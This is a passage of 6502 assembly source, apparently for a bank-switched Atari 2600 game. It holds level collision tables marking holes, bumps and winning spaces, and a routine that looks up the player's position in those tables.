dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column9Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column10Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column11Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column12Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column13Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column14Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column15Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column16Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 160-141 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ;============================== ORG $EFF6 BANKS_AND_VECTORS ;============================== ;##################################################### ;##################################################### ;##################################################### ;### ### ;### Bank 4 below ### ;### ### ;##################################################### ;##################################################### ;##################################################### ;============ org $F000 ;============ JUMP_TABLE org $F018 rorg $F018 ;================= Bank4Code ;================= LDA Player0HPosition ; initial value 78 SEC SBC #16 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. ; number is 0-31 ; If 0-15, handle in previous bank ; If 16-31, handle in this bank CMP #16 BMI EdgeCaseCheckBank4 ; we take this branch if we got here at middle of screen position case ;BMI ReturntoBank2FromBank4 SEC SBC #16 TAX ; number is 0-15 for bank4 checks LDA ProcessTableLSBBank4,X STA ReturnAddress LDA ProcessTableMSBBank4,X STA ReturnAddress+1 ; Get the line LDA Player0VPosition ; initial value 189 SEC IF DEBUG = 1 SBC #1 ELSE SBC #3 ENDIF TAY LDA (ReturnAddress),Y ;=========== BNE FinishedProcessingBank4 ; otherwise, check if we're an edge-case EdgeCaseCheckBank4 LDA Player0HPosition ; initial value 78 SEC SBC #16 CLC ADC #4 ; go from bit zero to bit 4 (of 7). LSR LSR ; divide by 4. ; number is 0-31 ; If 0-15, handle in previous bank ; If 16-31, handle in this bank CMP #16 BMI ReturntoBank2FromBank4 ; should never hit SEC SBC #16 TAX ; number is 0-15 for bank4 checks LDA ProcessTableLSBBank4,X STA ReturnAddress LDA ProcessTableMSBBank4,X STA ReturnAddress+1 ; Get the line LDA Player0VPosition ; initial value 189 SEC IF DEBUG = 1 SBC #1 ELSE SBC #3 ENDIF TAY LDA (ReturnAddress),Y FinishedProcessingBank4 ;=========== STA CollisionStatusFromTable ReturntoBank2FromBank4 ;================= ; Return to Bank 1 ;================= JMP Bank2 ;================= ProcessTableLSBBank4 ; 17-24 .byte #<Column17Information .byte #<Column18Information .byte #<Column19Information .byte #<Column20Information .byte #<Column21Information .byte #<Column22Information .byte #<Column23Information .byte #<Column24Information ; 25-32 .byte #<Column25Information .byte #<Column26Information .byte #<Column27Information .byte #<Column28Information .byte #<Column29Information .byte #<Column30Information .byte #<Column31Information .byte #<Column32Information ProcessTableMSBBank4 ; 17-24 .byte #>Column17Information .byte #>Column18Information .byte #>Column19Information .byte #>Column20Information .byte #>Column21Information .byte #>Column22Information .byte #>Column23Information .byte #>Column24Information ; 25-32 .byte #>Column25Information .byte #>Column26Information .byte #>Column27Information .byte #>Column28Information .byte #>Column29Information .byte #>Column30Information .byte #>Column31Information .byte #>Column32Information ;================================= ; Column Information organization ;================================= ; Conditions handled (LSB): ; Nothing = %0000 ; Bump = %0001 ; Hole = %0010 ; Winning space = %0011 ; 8 angles ; Conditions handled (MSB): ; Slope = 0-15 ; Slope = UR/UL/DL/DR bump Column17Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b HOLE dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 